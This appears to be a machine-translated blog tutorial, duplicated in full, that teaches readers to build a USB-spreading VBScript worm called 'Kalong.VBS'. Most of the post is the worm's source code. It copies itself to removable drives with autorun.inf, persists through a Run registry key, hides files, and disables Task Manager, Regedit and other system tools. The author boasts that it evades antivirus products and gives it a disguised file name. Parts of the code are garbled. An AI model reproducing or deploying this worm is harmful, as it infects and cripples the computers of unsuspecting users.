Flash fad Disc striking my brother suddenly I found a local malcode VBS made with the language. Well, it turns out the virus makers will begin to look to use VBS language. Maybe because it involves the IPR (Intellectual Property) for the many outstanding VB6.0 is pirated. So he made a virus with VBS that can be made only with the Windows Notepad because existing compiler integrated with it, Windows Based Script Host.
Sesua I promise, we will create a simple virus using Notepad. This virus will make himself spread to removable disc with autorun so that other computers will become infected flash disc plugged directly into the victim without waiting Users running her infector. This virus I give the name "Kalong.VBS". Now open Notepad him. Copy the following code:
'/ /-The beginning of the code, set for when the error is left and then continue the activities of virus-/ / on error resume next
'/ /-Dim following words-/ / dim rekur, windowpath, flashdrive, fs, mf, content, tf, bats, nt, check, sd
'/ / Set a text that will be made to Autorun Setup Information-/ / content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6.dll.vbs" set fs = CreateObject ("Scripting.FileSystemObject") set mf = fs.getfile (Wscript.ScriptFullname) dim text, size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream (1, -2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbCrLf loop do
'/ /-Copy itself to become the master file in the Windows Path (example: C: \ Windows) Set windowpath = fs.getspecialfolder (0) set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (windowpath & "\ batch-k4l0n6.dll.vbs", 2, true) tf.write recursive tf.close set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 39 '/ /-Make Atorun.inf to run the virus automatically each flash disc plugged-/ / 'It spreads to every drive that bertype 1 and 2 (removable) including floppy disks
for EACH flashdrive in fs.drives '/ /-Check the Drive-/ / If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'/ /-Make infector if it turns out Drivetypr 1 or 2. Or A: \ - / / set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs", 2, true) tf.write recursive tf.close set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 39
'/ /-Make the text of his Atorun.inf had already set up (Auto Setup Information) - / / set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true) tf.write content tf.close set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 39 end if next
'/ /-Manipulation of the Registry-/ /
set bat = CreateObject ("WScript.Shell")
'/ /-Manip - Change Internet Explorer Title to The Bat vs. Zay-/ / kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "The Bat vs. Zay "
'/ /-Manip - Set for hidden files are not displayed in Explorer-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"
'/ /-Manip - Eliminate the Find menu, Folder Options, Run, and block the Regedit and Task Manager-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableRegistryTools", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"
'/ /-Manip - Disable right-click / / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoViewContextMenu", "1", "REG_DWORD"
'/ /-Manip - Come up with messages every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ LegalNoticeCaption", "Worm Bat. Variant from Rangga-Zay, do not panic all data are safe. "
'/ /-Manip - On every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch-k4l0n6.dll.vbs"
'/ /-Manip - Change RegisteredOwner and Organization-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix" kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner", "Bat"
'/ /-Now if the code below I do not know, please Mas Aat_S to explain-/ / if check <> 1 then Wscript.sleep 200 000 end if loop while check <> 1 set sd = CreateObject ("Wscript.shell") sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname 'End of Code
Save the code in Notepad with the way FILE> SAVE. Then in the save as type choose "All Files (*.*). Save with the name: k4l0n6.dll.vbs. Actually do not have to use *. dll also okay but the effort to avoid suspicious aja.
He .. he ... This worm virus is not purely of my own thoughts because it mimics the virus code Rangga-Zay. But this one better because it was not detected using PCMAV RC15, ClamAV, and Avast. It was counted as it made you know if a virus / worm does not need to buy pirated software. Use Notepad (from Windows Original) can also
Sesua I promise, we will create a simple virus using Notepad. This virus will make himself spread to removable disc with autorun so that other computers will become infected flash disc plugged directly into the victim without waiting Users running her infector. This virus I give the name "Kalong.VBS". Now open Notepad him. Copy the following code:
'/ /-The beginning of the code, set for when the error is left and then continue the activities of virus-/ / on error resume next
'/ /-Dim following words-/ / dim rekur, windowpath, flashdrive, fs, mf, content, tf, bats, nt, check, sd
'/ / Set a text that will be made to Autorun Setup Information-/ / content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6.dll.vbs" set fs = CreateObject ("Scripting.FileSystemObject") set mf = fs.getfile (Wscript.ScriptFullname) dim text, size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream (1, -2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbCrLf loop do
'/ /-Copy itself to become the master file in the Windows Path (example: C: \ Windows) Set windowpath = fs.getspecialfolder (0) set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (windowpath & "\ batch-k4l0n6.dll.vbs", 2, true) tf.write recursive tf.close set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 39 '/ /-Make Atorun.inf to run the virus automatically each flash disc plugged-/ / 'It spreads to every drive that bertype 1 and 2 (removable) including floppy disks
for EACH flashdrive in fs.drives '/ /-Check the Drive-/ / If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'/ /-Make infector if it turns out Drivetypr 1 or 2. Or A: \ - / / set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs", 2, true) tf.write recursive tf.close set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 39
'/ /-Make the text of his Atorun.inf had already set up (Auto Setup Information) - / / set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true) tf.write content tf.close set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 39 end if next
'/ /-Manipulation of the Registry-/ /
set bat = CreateObject ("WScript.Shell")
'/ /-Manip - Change Internet Explorer Title to The Bat vs. Zay-/ / kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "The Bat vs. Zay "
'/ /-Manip - Set for hidden files are not displayed in Explorer-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"
'/ /-Manip - Eliminate the Find menu, Folder Options, Run, and block the Regedit and Task Manager-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableRegistryTools", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"
'/ /-Manip - Disable right-click / / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoViewContextMenu", "1", "REG_DWORD"
'/ /-Manip - Come up with messages every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ LegalNoticeCaption", "Worm Bat. Variant from Rangga-Zay, do not panic all data are safe. "
'/ /-Manip - On every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch-k4l0n6.dll.vbs"
'/ /-Manip - Change RegisteredOwner and Organization-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix" kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner", "Bat"
'/ /-Now if the code below I do not know, please Mas Aat_S to explain-/ / if check <> 1 then Wscript.sleep 200 000 end if loop while check <> 1 set sd = CreateObject ("Wscript.shell") sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname 'End of Code
Save the code in Notepad with the way FILE> SAVE. Then in the save as type choose "All Files (*.*). Save with the name: k4l0n6.dll.vbs. Actually do not have to use *. dll also okay but the effort to avoid suspicious aja.
He .. he ... This worm virus is not purely of my own thoughts because it mimics the virus code Rangga-Zay. But this one better because it was not detected using PCMAV RC15, ClamAV, and Avast. It was counted as it made you know if a virus / worm does not need to buy pirated software. Use Notepad (from Windows Original) can also
0 comments:
Posting Komentar